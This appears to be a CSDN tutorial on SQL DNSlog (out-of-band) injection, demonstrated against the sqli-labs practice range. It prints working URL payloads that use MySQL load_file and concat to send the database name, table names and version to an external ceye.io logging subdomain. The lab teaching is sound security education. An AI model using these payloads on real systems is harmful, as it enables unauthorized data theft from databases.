Detailed explanation of SQL DNSlog injection

Today, I will continue to introduce the relevant knowledge of Linux operation and maintenance. The main content of this article is SQL DNSlog injection.

Disclaimer:
The content introduced in this article is only used for learning and communication. It is strictly prohibited to use the technology in the article to conduct illegal acts, otherwise you will be responsible for all serious consequences!
Again: Penetration testing of unauthorized devices is strictly prohibited!

I. Introduction to SQL DNSlog injection

SQL Dnslog injection is a special way of displaying SQL injection. We all know that whether we use bool-based blind SQL injection or time-based blind SQL injection, there is a problem, that is, the injection time is relatively slow.In addition, there are some very special application scenarios, we can put our payload on the target site for execution, but the target site has no obvious echo, in this case, we can use SQL DNSLog injection.
The SQL injection of DNSlog refers to using the load_file function to load the specified file when the site is accessed. This function supports loading remote files.In this way, we can set the parameters of the load_file() function to the site we specify, and use the concat function to execute the SQL statement we want to detect, and use the execution result of the SQL statement as part of the load_file() function to access the site,When we initiate a DNS request, the target site can record this information by setting, so we get the result of SQL statement execution.

Second, SQL DNSlog injection combat

In order to achieve DNSLog injection, we must first have a server that can perform DNS queries normally and record domain name requests, http://ceye.io/ is a website that can implement and record DNS domain name query results and help us implement DNSLog injection.

After we register the site, the site will giveWe have a subdomain, as shown in the red line below:

As long as we initiate a DNS access request to the secondary subdomain under the subdomain, it can be recorded by the site and displayed to us.
Based on this, we can implement DNSLog injection.
We use sqli_lab as the range, the original web page of the range looks like this:

http://192.168.136.2/sqli/Less-1/?id=1

First, we can construct the payload injected by DNSLog,

http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select database()),'.ubhdz9.ceye.io\\abc'))--+

In the above payload, we embedded the select database() statement into the load_file() function as part of the load_file() function to enable DNS lookups for the site.
Similarly, we can construct other forms of payload, such as the payload that queries the database table name:

http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='security' limit 1,1),%27.ubhdz9.ceye.io\\abc'))--+

And the payload to query the database version:

http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select version()),'.ubhdz9.ceye.io\\abc'))--+

The execution result of the above payload is shown in the following figure:

As can be seen from the above figure, our SQL DNSLog injection was successful!
Originality is not easy, please indicate the source for reprinting: https://blog.csdn.net/weixin_40228200